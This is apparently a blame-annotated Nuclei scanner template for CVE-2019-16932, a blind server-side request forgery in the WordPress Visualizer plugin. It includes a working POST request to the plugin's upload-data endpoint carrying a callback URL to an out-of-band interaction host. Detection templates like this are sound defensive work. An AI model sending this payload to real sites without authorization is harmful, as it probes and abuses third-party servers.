2022-05-10 20:17:40 +00:00
|
|
|
id: CVE-2019-16932
|
|
|
|
|
|
|
|
info:
|
2022-05-24 15:53:00 +00:00
|
|
|
name: Visualizer <3.3.1 - Blind Server-Side Request Forgery
|
2022-05-10 20:17:40 +00:00
|
|
|
author: akincibor
|
2022-05-23 18:40:11 +00:00
|
|
|
severity: critical
|
2022-05-10 20:17:40 +00:00
|
|
|
description: |
|
2022-05-27 13:24:10 +00:00
|
|
|
Visualizer prior to 3.3.1 suffers from a blind server-side request forgery vulnerability via the /wp-json/visualizer/v1/upload-data endpoint.
|
2023-09-27 15:51:13 +00:00
|
|
|
impact: |
|
|
|
|
An attacker can exploit this vulnerability to send crafted requests to internal resources, potentially leading to unauthorized access or data leakage.
|
2023-09-06 12:53:28 +00:00
|
|
|
remediation: |
|
|
|
|
Update Visualizer plugin to version 3.3.1 or later to fix the SSRF vulnerability.
|
2022-05-10 20:17:40 +00:00
|
|
|
reference:
|
|
|
|
- https://wpscan.com/vulnerability/9892
|
|
|
|
- https://nathandavison.com/blog/wordpress-visualizer-plugin-xss-and-ssrf
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-16932
|
2022-05-23 18:40:11 +00:00
|
|
|
- https://wordpress.org/plugins/visualizer/#developers
|
2023-07-11 19:49:27 +00:00
|
|
|
- https://wpvulndb.com/vulnerabilities/9892
|
2022-05-23 18:40:11 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N
|
|
|
|
cvss-score: 10
|
|
|
|
cve-id: CVE-2019-16932
|
|
|
|
cwe-id: CWE-918
|
2023-07-11 19:49:27 +00:00
|
|
|
epss-score: 0.53434
|
2024-01-14 13:49:27 +00:00
|
|
|
epss-percentile: 0.97316
|
2023-09-06 12:53:28 +00:00
|
|
|
cpe: cpe:2.3:a:themeisle:visualizer:*:*:*:*:*:wordpress:*:*
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: themeisle
|
|
|
|
product: visualizer
|
2023-09-06 12:53:28 +00:00
|
|
|
framework: wordpress
|
2023-12-05 09:50:33 +00:00
|
|
|
tags: cve,cve2019,wp-plugin,ssrf,wordpress,xss,unauth,wpscan,intrusive,themeisle
|
2022-05-10 20:17:40 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2022-05-10 20:17:40 +00:00
|
|
|
- method: POST
|
|
|
|
path:
|
2023-07-11 19:49:27 +00:00
|
|
|
- "{{BaseURL}}/wp-json/visualizer/v1/upload-data"
|
2022-05-12 14:21:26 +00:00
|
|
|
|
2022-05-23 11:54:34 +00:00
|
|
|
body: '{\"url\":\"http://{{interactsh-url}}\"}'
|
2022-05-10 20:17:40 +00:00
|
|
|
|
|
|
|
headers:
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
2022-05-23 11:54:34 +00:00
|
|
|
- type: word
|
|
|
|
name: http
|
2023-07-11 19:49:27 +00:00
|
|
|
part: interactsh_protocol
|
2022-05-23 11:54:34 +00:00
|
|
|
words:
|
2023-07-11 19:49:27 +00:00
|
|
|
- http
|
2022-05-23 11:56:35 +00:00
|
|
|
|
2022-05-23 11:54:34 +00:00
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
2023-07-11 19:49:27 +00:00
|
|
|
- application/json
|
2022-05-23 11:54:34 +00:00
|
|
|
|
2022-05-10 20:17:40 +00:00
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2024-01-14 14:05:19 +00:00
|
|
|
# digest: 490a0046304402207989475e566a8c429d3ffb543eae9696bd0cd6ec52dd6126a0f10ca0df5380ba0220392172acb649aa5ecd64280b32ddf78e01a34d0a597bf1224d335bb8ecfa5445:922c64590222798bb761d5b6d8e72950
|